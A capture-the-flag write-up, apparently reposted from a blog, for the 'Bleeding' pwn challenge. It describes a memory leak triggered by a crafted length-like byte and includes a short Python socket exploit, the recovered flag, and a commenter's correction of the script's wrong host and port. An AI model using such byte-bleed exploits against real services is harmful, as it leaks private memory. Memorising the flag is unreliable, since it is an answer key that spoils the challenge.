Rating: 4.0

Problem:

Bleeding(pwn, 50 points)

"Let's bleed some bytes!"

bleed_client 4ff0eff1d46c1d74d152aaf36de6f2799020bdbc.ctf.site 50000

Attachment
pwn50_af93ddaf35df98ff.zip

Solution:

This program is kind of obscure at first in what it does, in-fact it seems pretty useless, and it is for our purposes. However, by looking in Wireshark we can see there's a prefix. Through experimentation, it seemed that changing the fifth byte to a higher number before sending seemed to return a shorter output. If we change it to a really low value (like 0x05), it spits out a more than it should, resulting in a memory leak. This was one of those problems where just playing around with it got me to the solution rather than all the theory and such.
If we send 0x05 as the fifth byte the flag is further up in memory which we can leak, I decided to use Python.

#!/usr/bin/python
import socket

if __name__ == "__main__":        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site', 55000))

        # Send our stuff
        for x in range(0, 3):
            s.send("\xef\x9e\x8d\xd8\x05\xfe\xba\xbe\x9f\xec\xff\xae\x8b\xbf\xfb\xff\x9f\xec\x0a\x00")

        # Is our flag here?
        for x in range(0, 3):
            print s.recv(1024)



<span>Flag: EKO{1m_bl33d1ng_byt35}</span>

Original writeup (http://specterdev.blogspot.ca/).
TrinidadNov. 1, 2016, 4:51 a.m.

hi, thanks for writeup

there is mistake in address: s.connect(('9a958a70ea8697789e52027dc12d7fe98cad7833.ctf.site', 55000))
should be: s.connect(('4ff0eff1d46c1d74d152aaf36de6f2799020bdbc.ctf.site', 50000))
cheers